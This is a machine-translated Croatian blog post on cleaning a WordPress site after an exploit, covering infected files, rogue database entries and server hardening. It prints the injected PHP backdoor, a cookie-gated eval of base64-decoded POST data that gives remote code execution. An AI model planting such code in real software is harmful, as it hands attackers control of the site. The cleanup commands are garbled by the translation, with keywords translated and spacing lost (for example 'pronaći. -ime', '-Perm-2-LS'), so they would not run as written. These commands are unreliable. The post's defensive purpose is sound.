Prije nego što pročitate ovaj post, trebali biste vidjeti post ovdje, Da bi razumjeli nešto. :)
Pronašao sam ga u nekoliko datoteka na blogu na stealthsettings.com, kodovi slični onima prikazanim u nastavku kao rezultat zaraze virusom podvig od WordPress.:
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>
Ako gore je o datoteci xmlrpc.php od pospan, U grep poslužitelja, izgleda dosta ove vrste u source koda.
Čišćenje zaraženih datoteka:
Ooookkkk ...
1. Najbolje rješenje, kao što je to učinjeno rezervaI čisti baza je brisanje slika WordPress (wp-config.php i datoteke koje nisu strogo povezane s wp platformom možete zadržati s poslužitelja i prenijeti izvorne iz verzije 2.5.1 (Na tom prigodom i napraviti nadogradnju verzije :) wp) http://wordpress.org/download/ . Obrišite uključujući i tematski datoteke ako ne vjeruju da njihov pažljivoj provjeri.
Čini se da su pogođeni i slika od tema koje nisu korištene prije nego što se na blogu i jednostavno mijenjanje teme, ne riješiti problem.
./andreea/wp-content/themes/default/index.php:
2. Pretraživanje i brisanje svih datoteka koje sadrže:... * _new.php, * _old.php, * Jpgg, * Giff, * Pngg i wp-info.txt datoteku, ako ih ima.
pronaći. -ime “* _new.php”
pronaći. -ime “* _old.php”
pronaći. -ime "* .jpgg"
pronaći. -ime “* _giff”
pronaći. -ime “* _pngg”
pronaći. -ime “wp-info.txt”
3. u / Tmp , Pretraživanje i brisanje mape kao što su tmpYwbzT2
SQL čišćenje :
1. i Tablica wp_options Provjerite i brisanje linije: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2. Sve u wp_options, ići active_plugins i izbrisati ako postoji plugin koji završava u jednom od nastavaka * _new.php, * _old.php, *. jpgg, *. giff, *. pngg ili ako se sumnja na drugom lokalnom, pažljivo provjerite.
3. U tablici wp_users, Vidjeti postoji li korisnik koji nije napisao ništa u svojoj desnoj strani, stupac user_nicename. Izbrišite ovog korisnika, ali zapamtite broj u stupcu ID. Ovaj korisnik će vjerojatno koristiti "WordPress”Ca user_login stvara se i pojavljuje se na 00: 00: 00 0000-00-00.
4. Idi na tablici wp_usermeta i izbrisati sve linije koje pripadaju ID gore.
Nakon što izvršite ovo čišćenje SQL-a, onemogućite i aktivirajte bilo koji dodatak. (u blogu -> Nadzorna ploča -> Dodaci)
Sigurna poslužitelja:
1. Pogledajte što direktorije i datoteke "pisati"(chmod 777) i pokušajte staviti a chmod koji više neće dopuštati njihovo pisanje na bilo kojoj razini. (chmod 644, na primjer)
Pronađite. -Perm-2-LS
2. Pogledajte što slika postavljen bit suid ili SGID . Ako ne koristite te datoteke staviti na njih chmod 0 ili deinstalirati paket koji sadrži. Oni su vrlo opasni, jer oni izvršavati privilegije "skupina"Ili"korijen"Ne s normalnim korisnik povlastice izvršiti tu datoteku.
pronaći /-tip f-Perm-04000-LS
pronaći /-tip f-Perm-02000-LS
3. Provjerite što portovi su otvoreni i pokušajte zatvoriti ili osigurati onima koji se ne koriste.
netstat-| grep-i slušanje
Toliko. Vidim Neki blogovi su zabranjeni de Google Search a drugi kažu "Dobro ih je napravio!!!" . Pa, učinio bih to za njih... ali što kažete ako Google počne banovati sve web stranice formiranje SPAM i staviti trojanaca (Trojan.Clicker.HTML) u kolačićima?
1 misao na "WordPress Iskorištavanje - Očistite virusne datoteke, SQL i sigurnost poslužitelja.”